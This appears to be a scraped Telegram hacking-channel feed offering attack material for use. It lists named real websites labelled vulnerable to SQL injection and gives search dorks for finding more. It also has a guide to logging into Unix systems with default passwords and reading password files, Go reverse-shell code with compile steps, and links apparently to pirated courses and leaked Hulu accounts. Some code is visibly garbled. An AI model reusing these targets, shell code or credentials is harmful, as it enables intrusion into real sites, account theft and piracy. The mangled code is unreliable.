UNDERCODE COMMUNITY
2.66K subscribers
1.23K photos
31 videos
2.65K files
79.1K links
πŸ¦‘ Undercode Cyber World!
@UndercodeCommunity


1️⃣ World first platform which Collect & Analyzes every New hacking method.
+ AI Pratice
@Undercode_Testing

2️⃣ Cyber & Tech NEWS:
@Undercode_News

3️⃣ CVE @Daily_CVE

✨ Web & Services:
β†’ Undercode.help
Download Telegram
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘Fresh SQLi Vulnerable Websites List :
-git sources 2020 :

http://www.estudanky.eu/poi.php?id=9344
http://www.oldgame.cz/nefunkcni_download.php?id=
http://www.sumava-zadov.cz/fotogalerie.php?id=22
http://www.oldgame.cz/download.php?id=341
http://www.stavebni-prace-plzen.cz/pdf.php?id=9
http://www.strechysimon.cz/zakazka.php?id=27
http://www.sumava-zadov.cz/fotogalerie.php?id=9
http://www.strechysimon.cz/zakazka.php?id=5
http://teamaero.pjz.cz/aktuality.php?id=193
http://www.oldgame.cz/nefunkcni_download.php?id=
http://www.sumava-zadov.cz/fotogalerie.php?id=22
http://www.oldgame.cz/download.php?id=341
http://www.stavebni-prace-plzen.cz/pdf.php?id=9
http://www.strechysimon.cz/zakazka.php?id=27
http://www.smelisting.net/corner_category.php?id=7

http://www.smelisting.net/corner_category.php?id=15

http://www.psukhabar.com/ReadArticle.php?id=1128&table=whispers

http://www.psukhabar.com/ReadArticle.php?id=1126&table=whispers

http://www.psukhabar.com/ReadArticle.php?id=1128&table=whispers

http://www.psukhabar.com/ReadArticle.php?id=1126&table=whispers
http://www.sumava-zadov.cz/fotogalerie.php?id=9
http://geca.ac.in/departments/department.php?id=5

http://www.geca.ac.in/departments/achivement.php?id=1

http://www.harmanindia.com/products-details.php?id=163&cats=Nail%20Polish%20
Bottle%20Caps

http://www.harmanindia.com/products-details.php?id=163&cats=Nail%20Polish%20
Bottle%20Caps

http://www.strechysimon.cz/zakazka.php?id=5
http://teamaero.pjz.cz/aktuality.php?id=193
http://www.sumava-zadov.cz/fotogalerie.php?id=22
http://www.oldgame.cz/download.php?id=341
http://www.stavebni-prace-plzen.cz/pdf.php?id=9
http://www.strechysimon.cz/zakazka.php?id=27
http://www.sumava-zadov.cz/fotogalerie.php?id=9
http://www.strechysimon.cz/zakazka.php?id=5

@UndercodeTesting
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘Hq gaming dorks :

nami //php= + site:top
"assasin" + "newbie" / ?php=avd + site:tt
FarmingSimulator / php?avd= site:wed
Xbox //php= + site:click
TreeofSavior / php?productid= site:garden
allintext: ".re" + "PCGaming"
FarmingSimulator / GrimDawn / ?php= + site:equipment
Depth .php?product
id = site:kw
"wukong" avd?id= site:fail
"TamrielUnlimited" sec?id= site:gt
intext: ".airforce" + "Launch"
game / php?param= site:software
huehuehuehue .php?productid = site:link
ekko //php= + site:degree
professionalgaming .php?product
id = site:plumbing
"np" itemid?id= site:ax
waiths / darius / ?php= + site:voting
source: ".uz" + "Competitive"
soloqueue .php?sec = site:garden
"Medieval2" + "esports" / ?php=login
id + site:rentals
"JustSurvive" pageid?id= site:fj
ShakesandFidget //php= + site:dance
ryse .php?coID = site:sr
bait .php?id = site:rich
Rhythm / php?login
id= site:fish
overextending / php?param= site:mo
Ragnarok //php= + site:nl
inurl: ".taxi" + "powerstargold"
"Masterrace" id?id= site:wedding
"suppress" itemid?id= site:supply
anivia //php= + site:edu
HeartsofIron .php?avd = site:bq
snowballing / bot / ?php= + site:limited
FlightSimulator //php= + site:be
huehuehuehue / php?panel= site:ooo
shaco //php= + site:gn
"riseofthetombraider" + "powerstargold" / ?php=id + site:supply
Gratis //php= + site:host
Evolve / Deadbydaylight / ?php= + site:graphics
SaintsRow / JRPG / ?php= + site:garden
AdVentureCapitalist / ShopHeroes / ?php= + site:gf
trundle .php?item
id = site:se
location: ".do" + "WP"
"inside" sec?id= site:menu
udraw / microsoft / ?php= + site:my
"metagame" productid?id= site:ir
filetype: ".mz" + "screamride"
"Trove" + "PathofExile" / ?php=sec + site:blue
allintitle: ".technology" + "malzahar"
exergaming / php?id= site:estate
Cheats / teamfortess / ?php= + site:cc
"wireless" + "windows" / ?php=user
id + site:hosting
fighterwithin / php?purchaseid= site:reviews
"SHOGUN2" + "Gaben" / ?php=product
id + site:tp
jayce / deny / ?php= + site:bt
"messengerkit" + "kinectsports" / ?php=userid + site:im
source: ".at" + "Action"
mediaremote .php?item
id = site:sd
deadrising / php?cat= site:today
xboxone / php?sec= site:diamonds
seaofthieves //php= + site:feedback
splitpush //php= + site:camp
Console / deadrising / ?php= + site:tt
Fallout4 / php?cat= site:ug
evelynn .php?loginid = site:feedback
"omw" item
id?id= site:luxury
debuff .php?id = site:press
acecombat6 //php= + site:estate
freeskins / php?cat= site:country
inurl: ".cruises" + "karma"
"poppy" panel?id= site:tennis
id: ".eat" + "inside"
Mechanical / Evolve / ?php= + site:partners
"carry" + "durable" / ?php=id + site:ni
SunsetOverdrive //php= + site:museum

> git sources :
@UndercodeTesting
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘ btc_dorks :

coinbase news.jsf?Cat=
ethereum devcon.ashx?framecode=
bitcoin miner.bphpx?idproduct=
coinbase deposit fee.cfm?CatalogID=
c bitcoin library.raw?GAMEID=
bitcoin atm.cfm?item=
bitcoin app.flv?GameID=
ethereum dao.File?order
id=
ethereum blue.flv?Action=
ethereum block explorer.File?gpu=
coinbase exchange review.php4?gameid=
ethereum
foundation.blog?storeid=
bitcoin buy.tss?PartID=
coinbase and bitcoin gold.pdf?&game
type=
coinbase golemcontact-us?item=
bitcoin explorercfmPageID
bitcoin miner.b.php3?ViewType=
coinbaseblog/?itemid=
bitcoin china.flv?itemid=
coinbase debit card.htm?style
id=
bitcoin dollar.tss?UserID=
ethereum historical price.cfmgrname=
bitcoin cash.php?BookID=
ethereum future price.jsp?shopcd=
ethereum block explorer.ashx?StyleID=
system d bitcoin.raw?game
link=
ethereum exchangeaspx?ServiceID=
ethereum devcon.jsf?p=
coinbase to add ripple.File?Cat=
ethereum exchange rate.raw?GP=
ethereum alliance members.jsf?gameType=
coinbase credit card limit.ashx?gamereferral=
coinbase gdax fees.html?item
ID=
coinbase gdax account.ashx?idproduct=
bitcoin wallet.asp?cartId=
ethereum coin.cfmshopcd=
is coinbase a publicly traded company.php3?iCat=
ethereum gpuevents?gameNo=
coinbase bank account.blog?Cart=
coinbase affiliate.pdf?StyleID=
bitcoin chart.raw?userID=
c bitcoin library.jsf?userID=
coinbase ethereum.php?grname=
bitcoin app.html?keyword=
ethereum dao hack.cfm?Store
Id=
what is a coinbase transactioncat/?action=
coinbase bank account.pdf?showtopic=
bitcoin bubbleaspidCategory=
coinbase a paypal.flv?framecode=
ethereum hard forkaspPageID
bitcoin blockchain.php3?gr=
ethereum github.cfmGameName=
ethereum byzantium.flv?articleid=
coinbase emailcontact-us?GP=
coinbase golem.phpid=
coinbase bch.File?order
id=
bitcoin documentaryphpx?itemid=
ethereum hard forkcfmgamerblogid=
coinbase contact.aspitem
id=
coinbase forgot passwordsite/?cartId=
coinbase forecast.jsf?designer=
coinbase gdax account.psml?product=
ethereum flash crashaspx?cartid=
capital b bitcoinsite/?code=
c bitcoin wallet.phpgame
id=
coinbase a paypal.asp?gamereferral=
bitcoin b font.phtml?Sku=
ethereum byzantium.php?productid=
what is a coinbase transaction.aspx?gamesearch=
bitcoin address lookup.php&GameID=
coinbase founder.phtml?&gametype=
ethereum foundationcfmitemid=
ethereum coin priceaspbookid=
bitcoin c sharp.raw?item=
ethereum founder.html?action=
c bitcoin miner.raw?game
link=
bitcoin app.php3?keyword=
ethereum a good investmentcontact-us?PageID


@UndercodeTesting
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁


πŸ¦‘ShellReset RAT utilizes word documents based on malicious macros to spread :

1) From February to May 2020, we observed that four new Microsoft Word documents based on malicious macros were hosted on new registration sites based on .space and .xyz domains. Because the deployment strategy, technology, and process (TTP) of the final payload of several documents are very similar, we believe this is the behavior of the same attacker.

2) It is understood that the final version of the .NET payload has never been detected before. Its code segment is small and overlaps with QuasarRAT, but this code segment is not used at runtime. Based on the unique string in the final payload, we named the RAT ShellReset. Due to the limited number of detections, we believe this may be a small-scale attack activity, and the themes used by the attackers in this attack process are also related to the hot events in London this year, including 5G Expo and Futurebuild .

3) The infection chain involved some interesting techniques, such as using trusted Windows utilities to compile the payload on the terminal at runtime to bypass the security mechanism, and downloading the obfuscated source code from the attacker’s server. In this article, I will analyze the distribution strategy and attack technology in detail.

@UndercodeTesting
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘LINUX BEGINERS TIPS :


NOTE: DUE TO THE MANY DIFFERENT
VERSIONS OF UNIX (BERKLEY UNIX,
BELL SYSTEM III, AND SYSTEM V
THE MOST POPULAR) MANY COMMANDS
FOLLOWING MAY/MAY NOT WORK. I HAVE
WRITTEN THEM IN SYSTEM V ROUTINES.
UNIX/XENIX OPERATING SYSTEMS WILL
BE CONSIDERED IDENTICAL SYSTEMS BELOW.

HOW TO TELL IF/IF NOT YOU ARE ON A
UNIX SYSTEM: UNIX SYSTEMS ARE QUITE
COMMON SYSTEMS ACROSS THE COUNTRY.
THEIR SECURITY APPEARS AS SUCH:

LOGIN; (OR LOGIN;)
PASSWORD:

WHEN HACKING ON A UNIX SYSTEM IT IS
BEST TO USE LOWERCASE BECAUSE THE UNIX
SYSTEM COMMANDS ARE ALL DONE IN LOWER-
CASE.
LOGIN; IS A 1-8 CHARACTER FIELD. IT IS
USUALLY THE NAME (I.E. JOE OR FRED)
OF THE USER, OR INITIALS (I.E. J.JONES
OR F.WILSON). HINTS FOR LOGIN NAMES
CAN BE FOUND TRASHING THE LOCATION OF
THE DIAL-UP (USE YOUR CN/A TO FIND
WHERE THE COMPUTER IS).
PASSWORD: IS A 1-8 CHARACTER PASSWORD
ASSIGNED BY THE SYSOP OR CHOSEN BY THE
USER.
COMMON DEFAULT LOGINS
--------------------------
LOGIN; PASSWORD:
ROOT ROOT,SYSTEM,ETC..
SYS SYS,SYSTEM
DAEMON DAEMON
UUCP UUCP
TTY TTY
TEST TEST
UNIX UNIX
BIN BIN
ADM ADM
WHO WHO
LEARN LEARN
UUHOST UUHOST
NUUCP NUUCP

IF YOU GUESS A LGIN NAME AND YOU ARE
NOT ASKED FOR A PASSWORD, AND HAVE
ACCESSED TO THE SYSTEM, THEN YOU HAVE
WHAT IS KNOWN AS A NON-GIFTED ACCOUNT.
IF YOU GUESS A CORRECT LOGIN AND PASS-
WORD, THEN YOU HAVE A USER ACCOUNT.
AND, IF YOU GUESS THE ROOT PASSWORD,
THEN YOU HAVE A "SUPER-USER" ACCOUNT.
ALL UNIX SYSTEMS HAVE THE FOLLOWING
INSTALLED TO THEIR SYSTEM:
ROOT, SYS, BIN, DAEMON, UUCP, ADM
ONCE YOU ARE IN THE SYSTEM, YOU WILL
GET A PROMPT. COMMON PROMPTS ARE:

$
%
#

BUT CAN BE JUST ABOUT ANYTHING THE
SYSOP OR USER WANTS IT TO BE.

THINGS TO DO WHEN YOU ARE IN: SOME
OF THE COMMANDS THAT YOU MAY WANT TO
TRY FOLLOW BELOW:

WHO IS ON (SHOWS WHO IS CURRENTLY
LOGGED ON THE SYSTEM.)
WRITE NAME (NAME IS THE PERSON YOU
WISH TO CHAT WITH)
TO EXIT CHAT MODE TRY CTRL-D.
EOT=END OF TRANSFER.
LS -A (LIST ALL FILES IN CURRENT
DIRECTORY.)
DU -A (CHECKS AMOUNT OF MEMORY
YOUR FILES USE;DISK USAGE)
CD\NAME (NAME IS THE NAME OF THE
SUB-DIRECTORY YOU CHOOSE)
CD\ (BRINGS YOUR HOME DIRECTORY
TO CURRENT USE)
CAT NAME (NAME IS A FILENAME EITHER
A PROGRAM OR DOCUMENTATION
YOUR USERNAME HAS WRITTEN)
MOST UNIX PROGRAMS ARE WRITTEN
IN THE C LANGUAGE OR PASCAL
SINCE UNIX IS A PROGRAMMERS'
ENVIRONMENT.
ONE OF THE FIRST THINGS DONE ON THE
SYSTEM IS PRINT UP OR CAPTURE (IN A
BUFFER) THE FILE CONTAINING ALL USER
NAMES AND ACCOUNTS. THIS CAN BE DONE
BY DOING THE FOLLOWING COMMAND:

CAT /ETC/PASSWD

IF YOU ARE SUCCESSFUL YOU WILL A LIST
OF ALL ACCOUNTS ON THE SYSTEM. IT
SHOULD LOOK LIKE THIS:

ROOT:HVNSDCF:0:0:ROOT DIR:/:
JOE:MAJDNFD:1:1:JOE COOL:/BIN:/BIN/JOE
HAL::1:2:HAL SMITH:/BIN:/BIN/HAL

THE "ROOT" LINE TELLS THE FOLLOWING
INFO :
LOGIN NAME=ROOT
HVNSDCF = ENCRYPTED PASSWORD
0 = USER GROUP NUMBER
0 = USER NUMBER
ROOT DIR = NAME OF USER
/ = ROOT DIRECTORY

IN THE JOE LOGIN, THE LAST PART
"/BIN/JOE " TELLS US WHICH DIRECTORY
IS HIS HOME DIRECTORY (JOE) IS.

IN THE "HAL" EXAMPLE THE LOGIN NAME IS
FOLLOWED BY 2 COLONS, THAT MEANS THAT
THERE IS NO PASSWORD NEEDED TO GET IN
USING HIS NAME.

#git sources
@undercodeTesting
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘Build Your own termux app :

>Scripts and patches to build packages for the Termux Android application.


1) https://github.com/termux/game-packages


2) https://github.com/termux/science-packages


3) https://github.com/termux/termux-root-packages


4) https://github.com/termux/unstable-packages


5) https://github.com/termux/x11-packages

πŸ¦‘disabled-packages:

Packages that cannot be published due to serious issues.

ndk-patches: https://github.com/termux/termux-packages/blob/master/disabled-packages

Our changes to Android NDK headers.

packages: https://github.com/termux/termux-packages/blob/master/ndk-patches

Main set of packages.

sample: https://github.com/termux/termux-packages/blob/master/sample

Sample structure for creating new packages.

scripts: https://github.com/termux/termux-packages/blob/master/scripts

Set of utilities and build system scripts.

@UndercodeTesting
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘Getting used to using your keyboard exclusively and leaving your mouse behind will make you much more efficient at performing any task on any Windows system. I use the following keyboard shortcuts every day:

> For all windows Verisions mostly ...

Windows key + R = Run menu

This is usually followed by:
cmd = Command Prompt
iexplore + "web address" = Internet Explorer
compmgmt.msc = Computer Management
dhcpmgmt.msc = DHCP Management
dnsmgmt.msc = DNS Management
services.msc = Services
eventvwr = Event Viewer
dsa.msc = Active Directory Users and Computers
dssite.msc = Active Directory Sites and Services
Windows key + E = Explorer

ALT + Tab = Switch between windows

ALT, Space, X = Maximize window

CTRL + Shift + Esc = Task Manager

Windows key + Break = System properties

Windows key + F = Search

Windows key + D = Hide/Display all windows

CTRL + C = copy

CTRL + X = cut

CTRL + V = paste

Also don't forget about the "Right-click" key next to the right Windows key on your keyboard. Using the arrows and that key can get just about anything done once you've opened up any program.


Keyboard Shortcuts

Alt and Esc Switch between running applications

Alt and letter Select menu item by underlined letter

Ctrl and Esc Open Program Menu

Ctrl and F4 Close active document or group windows (does not work with some applications)

Alt and F4 Quit active application or close current window

Alt and - Open Control menu for active document

Ctrl] Lft., Rt. arrow Move cursor forward or back one word

Ctrl] Up, Down arrow Move cursor forward or back one paragraph

F1 Open Help for active application

Windows+M Minimize all open windows

Shift+Windows+M Undo minimize all open windows

Windows+F1 Open Windows Help

Windows+Tab Cycle through the Taskbar buttons

Windows+Break Open the System Properties dialog box

#git sources
@UndercodeTesting
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
biggest list of add servers for spamming or blocking then on windows-android..

pastebin.com/XrSNhABy
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘ A Reverse HTTP Shell In Kali Linux:

HERE’S WHAT YOU NEED :

1) Kali Linux Virtual Instance (VirtualBox)

2) Windows 10 Virtual Instance (VirtualBox) -OR-

3) Linux Virtual Instance (VirtualBox)

4) Here is the code for my program, in a file named tcpServer.go:

package main import (
"bufio"
"fmt"
"log"
"net"
"os/exec" "strings"

)
const (
RPORT = "4444"
)
func CheckErr(e error) {
if e != nil {
log.Fatal("Error %s", e)
}
}
func main() {
conn, err := net.Dial("tcp", fmt.Sprintf("10.0.2.5:%s", RPORT)) CheckErr(err)
remoteCmd, err := bufio.NewReader(conn).ReadString('\n') CheckErr(err)
// remove newline character
newCmd := strings.TrimSuffix(remoteCmd, "\n")
command := exec.Command(newCmd)
command.Stdin = conn
command.Stdout = conn
command.Stderr = conn
command.Run()
}

πŸ¦‘After putting together the program I need to compile the client for Windows for my Windows target. This is how it is done below:

> 1 macbook$ GOOS=windows GOARCH=386 go build -o evilbinary.exe simpleClient.go
2) The program works fine except for it is still primitive. I mean by that it

3) can not handle server crashes or unexpected input from the client.
FLAGS IN GO ARE EASY

4) If you don’t agree with the preceding statement, try setting flags in C#…Flags in go are supported by the standard library. All you have to do is set flags and interact with them to provide arguments to your

5) Here is a basic example of checking for arguments passed via the command line to our program. :

func main() {
// read args
arguments := os.Args
if len(arguments) == 1 {
fmt.Println("Not enough arguments!") return
}

> 1 macbook$ go run tcpServer.go -p 4444

6) The value after the flag will be read and passed to the value of *stringPtr. The following code will output β€œListening on 4444…”, because the value of the pointer to the string flag variable has been set as 4444.

7) LPORT := flag.String("p", "", "port to listen on")
fmt.Printf("lport is %s", *LPORT)
flag.Parse()
l, err := net.Listen("tcp4", fmt.Sprintf("127.0.0.1:%s", *LPORT)) CheckErr(err)
fmt.Printf("Listening on %s for incoming connections\n", *LPORT)

@UndercodeTesting
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
A Reverse HTTP Shell In Kali Linux- start practice your own now
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘Greatest 2020 Hacking tools-Tracking-backdoor and more...


0trace 1.5 A hop enumeration tool http://jon.oberheide.org/0trace/

3proxy 0.7.1.1 Tiny free proxy server. http://3proxy.ru/
3proxy-win32 0.7.1.1 Tiny free proxy server. http://3proxy.ru/

42zip 42 Recursive Zip archive bomb. http://blog.fefe.de/?ts=b6cea88d

acccheck 0.2.1 A password dictionary attack tool that targets windows authentication via the SMB protocol. http://labs.portcullis.co.uk/tools/acccheck/

Spyse OSINT gathering tool that scans the entire web, enrich and collect all the data in its own DB for instant access. Provided data: IPv4 hosts, sub/domains/whois, ports/banners/protocols, technologies, OS, AS, wide SSL/TLS DB and more. https://spyse.com/

findsubdomains Complete subdomains sacnning service.(works using OSINT). https://findsubdomains.com

sublist3r subdomains enumeration tool for penetration testers https://github.com/aboul3la/Sublist3r

ASlookup Made for identifying the owner of an IP range(CIDR), ASN, related ASN, registry, etc... http://aslookup.com
ace 1.10 Automated Corporate Enumerator. A simple yet powerful VoIP Corporate Directory enumeration tool that mimics the behavior of an IP Phone in order to download the name and extension entries that a given phone can display on its screen interface http://ucsniff.sourceforge.net/ace.html

admid-pack 0.1 ADM DNS spoofing tools - Uses a variety of active and passive methods to spoof DNS packets. Very powerful. http://packetstormsecurity.com/files/10080/ADMid-pkg.tgz.html

@UndercodeTesting
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘TOPIC HACKING COURSES & TOOLS 2020 :

SEC760 - Advanced Exploit Development for Penetration Testers : https://mirr.re/d/pTv
SEC617 - Wireless Penetration Testing and Ethical Hacking : https://mirr.re/d/pTy
SEC642 - Advanced Web App Penetration Testing, Ethical Hacking, and Exploitation Techniques : https://mirr.re/d/pTx
SEC660 - Advanced Penetration Testing, Exploit Writing, and Ethical Hacking : https://mirr.re/d/pTw
SEC580 - Metasploit Kung Fu for Enterprise Pen Testing : https://mirr.re/d/pU0
SEC599 - Defeating Advanced Adversaries - Implementing Kill Chain Defenses : https://mirr.re/d/pTz
SEC561 - Immersive Hands-on Hacking Techniques : https://mirr.re/d/pU4
SEC564 - Red Team Operations and Threat Emulation : https://mirr.re/d/pU3
SEC566 - Implementing and Auditing the Critical Security Controls - In-Depth : https://mirr.re/d/pU2
SEC573 - Automating Information Security with Python : https://mirr.re/d/pU1
SEC560 - Network Penetration Testing and Ethical Hacking : https://mirr.re/d/pUA
SEC550 - Active Defense, Offensive Countermeasures and Cyber Deception : https://mirr.re/d/pUC
SEC555 - SIEM with Tactical Analytics : https://mirr.re/d/pUB
SEC511 - Continuous Monitoring and Security Operations : https://mirr.re/d/pUE
SEC542 - Web App Penetration Testing and Ethical Hacking : https://mirr.re/d/pUD
SEC506 - Securing Linux-Unix : https://mirr.re/d/pUF
SEC504 - Hacker Tools, Techniques, Exploits, and Incident Handling : https://mirr.re/d/pUH
SEC505 - Securing Windows and PowerShell Automation : https://mirr.re/d/pUG
SEC501 - Advanced Security Essentials - Enterprise Defender : https://mirr.re/d/pUJ
SEC503 - Intrusion Detection In-Depth : https://mirr.re/d/pUI
SEC401 - Security Essentials Bootcamp Style : https://mirr.re/d/pUP
FOR610 - Reverse-Engineering Malware Malware Analysis Tools and Techniques : https://mirr.re/d/pUS
ICS410 - ICS SCADA Security Essentials : https://mirr.re/d/pUR
MGT514 - Security Strategic Planning, Policy, and Leadership : https://mirr.re/d/pUQ
FOR585 - Advanced Smartphone Forensics : https://mirr.re/d/pUT
FOR508 - Advanced Digital Forensics, Incident Response, and Threat Hunting : https://mirr.re/d/pUX
FOR518 - Mac and iOS Forensic Analysis and Incident Response : https://mirr.re/d/pUW
FOR526 - Memory Forensics In-Depth : https://mirr.re/d/pUV
FOR572 - Advanced Network Forensics Threat Hunting, Analysis, and Incident Response : https://mirr.re/d/pUU
FOR500 - Windows Forensic Analysis : https://mirr.re/d/pUY


@UndercodeTesting
▁ β–‚ β–„ ο½•π•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
πŸ¦‘X56 HULU PREMIUMβœ…

> provide with screanshoat after login to @Undercode_bot

pastebin.com/9HdcwYHN